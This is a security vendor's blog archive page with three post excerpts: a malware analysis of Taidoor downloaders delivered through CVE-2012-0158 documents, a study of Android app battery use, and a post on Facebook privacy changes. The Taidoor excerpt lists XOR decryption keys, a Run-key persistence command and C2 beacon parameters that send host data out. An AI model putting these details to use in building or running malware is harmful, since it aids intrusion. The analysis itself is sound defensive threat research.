Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    December 2012
    S M T W T F S
    « Nov   Jan »
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    3031  
  • Email Subscription

  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Archive for December 3rd, 2012




    We’ve been seeing an increase in Taidoor downloaders in the wild, but instead of embedding the backdoor in email attachments, the current trend in Taidoor-related attacks is to include an attachment with a Taidoor-downloading Trojan.

    Based on the sample set we gathered, it appears this type of technique has only been used this year. For the most part, the delivery method is a socially-engineered email with an attachment that exploits the MS12-027 MSCOMCTL.OCX RCE Vulnerability (CVE-2012-0158) , which is becoming the favorite exploit of several groups. In this case, the targets are mostly Japanese companies and US Defense contractors.

    Embedded in the document files is a simple downloader. Like Taidoor, this downloader comes with a packer but instead of using the RC4 decryption/encryption method, a simple XOR is used to decrypt the downloader component with the 16-bit hardcoded key below:

    • 22 3A 58 40 79 A1 16 11 89 F3 C7 66 37 90 3B 00

    Zeroes are skipped and left as is.

    The component is saved as ntuser.cfg in the %User Profile% folder and the registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NTUCF = rundll32 %User Profile%\ntuser.cfg,Config is created to maintain its persistence.

    It then connects to its server using the following distinct parameters:

    //fc.asp?est=[campaign code]&hn=[computer name]&ha=[ip address]&hm=[mac address]&hv=[path of AV installed]&hb=[system type (64 or 86)]&hp=[proxy]

    To decode the parameters, we need to XOR the parameter values starting from “hn” with 07. The server should reply with a 200ok message before it attempts to download another .HTML file named “dw.html”. This contains a link to the .PDF file it downloads and decrypts a portion of it using the same decryption method as its packer with another hard-coded key:

    • 21 5A 52 46 35 A7 16 11 89 F3 C7 66 37 90 3B 00

    It then saves the decrypted code as ~db98.tmp in the Temp Folder, which is the Taidoor component. Technically, it could be any file, but so far, all the samples point to Taidoor. The Taidoor packer changed a bit, as it now checks for HKLM\ SOFTWARE\KasperskyLab in addition to the HKLM\SOFTWARE\McAfee registry key. It can be recalled that this registry key checking is used to determine which process will invoke the executable file. Below are the processes used in relation to these registry keys:

    • HKLM\ SOFTWARE\KasperskyLab – verclsid.exe {malware path and filename}.exe
    • HKLM\SOFTWARE\McAfee – services.exe {malware path and filename}.exe
    • Default – svchost.exe {malware path and filename}.exe

    Other than that, the main Taidoor binary is the same as the old variants.

    Read the rest of this entry »

     
    Posted in Malware, Targeted Attacks | Comments Off



    In this part 3 as the last entry, I will report the result of our investigation on app-related battery consumption issue and its reality.

    Android Apps’ Battery Consumption Issue

    According to Trend Micro research, almost 47% of smartphone users in Japan are bothered by their device’s battery longevity.

    Dubbed “PC on your palm” the smartphone’s design puts prime on portability, which inadvertently leads to battery resource issues. Previously, traditional feature phone devices did not have this concern, as their manufacturing companies were directly responsible for overall development and quality assurance of device’s components e.g. from device’s operating system up to its apps.

    With smartphones, users can install third-party apps that are less dependent on the devices and their respective manufacturers. On the positive side, this brought changes to the apps market, in which new players can now participate and release their own apps. In turn, this made the app market dynamic and new apps are regularly introduced.

    The downside, however, is that app development is not aligned with smartphone devices and their operating systems, making quality assurance more complicated and fragmented. Because anyone can join this market, even individuals with insufficient technical knowledge can easily release an app. This could be a reason why “potentially unwanted apps” consume too much device resource.

    Resource Consumption Used by Free Android Apps

    Sampling the top 200 apps (both general apps and game apps) among free apps on Google Play, for August 31, 2012, Trend Micro examined their resource consumption using Trend Micro Mobile App Reputation (MAR). The details of the sampled data are as follows:

    Measuring battery consumption is not an easy task since it is determined by complex combination of apps and hardware. In MAR’s investigation, we created three levels of battery consumption using various combinations of factors such as network bandwidth, memory consumption, hardware used, etc.

    Read the rest of this entry »

     
    Posted in Mobile | Comments Off



    Last week, many people made posts like this on Facebook:

    While this was quickly debunked as being entirely untrue, the fact that millions of people made the very same post speaks volumes about how worried people about their privacy on Facebook.

    It’s probably not helping that Facebook just finished soliciting comments on their new Data Use Policy and their Statement of Rights and Responsibilities. Privacy groups in the US – specifically, the Electronic Privacy Information Center (EPIC) and the Center for Digital Democracy (CDD) – have objected to the changes.

    The most significant part of the changes would deal with how Facebook is (notionally) governed. In theory, changes to its policies are subject to votes by Facebook users. In practice, the process has been unsuccessful – there have been two previous votes since April 2009 (when it was announced). However, turnout has been low, with less than one percent of Facebook users participating. The changes would remove the voting process entirely.

    Other changes include making it explicit that information can be shared with Facebook affiliates like Instagram and changes in how messages are handled (instead of a blanket setting on who can and can’t send messages to a user, filters will be offered instead).

    This is all just part of the greater debate surrounding privacy and Facebook. News events like this merely bring it to the forefront of people’s minds. The question really is: how much of our data should be online? How much of our data that is online should be able to be used by the free social media networks that we’re part of?

    Read the rest of this entry »

     
    Posted in Social | Comments Off


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice